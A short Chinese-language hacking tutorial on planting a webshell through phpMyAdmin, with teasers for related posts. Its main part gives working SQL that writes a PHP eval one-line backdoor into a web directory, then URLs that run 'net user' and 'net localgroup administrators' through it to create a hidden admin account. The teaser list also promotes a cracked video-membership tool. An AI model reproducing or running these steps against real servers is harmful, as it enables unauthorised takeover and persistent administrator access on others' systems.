利用phpMyAdmin拿webshell
首先用暴路径漏洞找到绝对路径,然后替换下面的路径
随便选个数据库,然后执行以下的sql(利用sql命令导出一个shell)
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘D:\www\dmtz\bbs\upload\phpmyadmin\eval.php‘;
Drop TABLE IF EXISTS a;
这是我们的后门
http://chncto.com/phpmyadmin/eval.php
加个系统帐号
http://chncto.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://chncto.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add
相关文章
什么叫做一句话木马?便是一句简易的开发语言
什么叫做一句话木马? 便是一句简易的开发语言,一句话木马分成Php,asp,aspx等 中国菜刀: 联接一句话木马的专用工具; 试验的目地: 根据一句话木马来操纵大家的网...
安全扫描器IBM Appscan v8.8
之前使用FreeBuf大牛共享APPSCAN8.7,最近电脑换了Win8.1,再装APPSCAN8.7时,发现没办法使用,装了.NET Framework 3.5也是一样,去官...
Cisco环境解决ARP欺骗问题
因为经常看到网上有看到求助ARP病毒防范办法,其实ARP欺骗原理简单,利用的是ARP协议的一个“缺陷”,免费ARP来达到欺骗主机上面的网关的ARP表项。 其实免费ARP当时设计出来是为了2个作用的...
《网络黑白》PDF一键下载
《网络黑白》该书是“花无际”著作。文件目录以下: 第一章 您好 网络黑客 我的安全性之途 网络黑客发展史 对安全性的思索 怎样学习网络黑客 百度搜索引擎英语的语法 网络黑客武器尖刀 普遍进攻方式 被...
AngryIPScanner是不是适用全部电脑操作系统?
什么是Angry IP Scanner? Angry IP Scanner是一个混合开发和一个开源系统互联网扫描机,建立迅速,便于应用。网络工程师一般 应用大中型和中小型企业,金融机构和政府部门。此...
爱奇艺会员终结者v2.5 绿色最新版 免费下载
爱奇艺会员终结者v2.5 绿色最新版 免费下载 软件大小:1.93M 软件语言:中文 更新时间:2014-4-2 软件类别:免费/媒体播放 软件性质:PC软件 运行环境:...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!